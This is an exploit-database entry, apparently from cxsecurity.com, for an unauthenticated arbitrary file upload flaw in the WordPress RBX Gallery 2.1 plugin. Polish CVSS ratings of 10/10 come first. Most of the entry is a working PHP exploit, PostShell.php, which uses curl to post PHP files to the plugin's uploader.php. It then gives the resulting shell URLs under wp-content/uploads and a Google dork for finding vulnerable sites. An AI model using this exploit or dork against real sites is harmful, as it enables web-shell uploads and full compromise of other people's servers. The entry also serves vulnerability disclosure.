WordPress RBX Gallery 2.1 Shell Upload

2012-06-10 / 2012-06-24
Credit: Sammy FORGIT
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


Ogólna skala CVSS: 10/10
Znaczenie: 10/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

################################################## # Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File Upload Vulnerability # Version : 2.1 # Link : http://wordpress.org/extend/plugins/rbxgallery/ # Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip # Date : 03-06-2012 # Google Dork : inurl:/wp-content/plugins/rbxgallery/ # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr ################################################## Exploit : PostShell.php <?php $uploadfile="lo.php"; $uploadfile2="db.php"; $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('images[0]'=>"@$uploadfile", 'images[1]'=>"@$uploadfile2", 'Submit'=>'submit')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php lo.php <?php phpinfo(); ?>

Referencje:

http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top